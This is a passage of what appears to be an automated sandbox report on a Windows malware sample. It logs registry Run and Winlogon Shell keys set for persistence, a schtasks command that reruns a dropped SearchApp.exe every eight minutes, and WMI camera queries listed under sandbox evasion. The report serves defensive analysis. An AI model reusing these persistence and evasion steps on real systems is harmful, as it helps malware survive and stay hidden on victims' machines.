                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommonJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchAppJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /f
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchAppJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SearchAppJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommonJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommonJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommonJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bridgeportDhcpcommonJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQJump to behavior
                                    Source: C:\Users\user\Desktop\544WP3NHaP.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
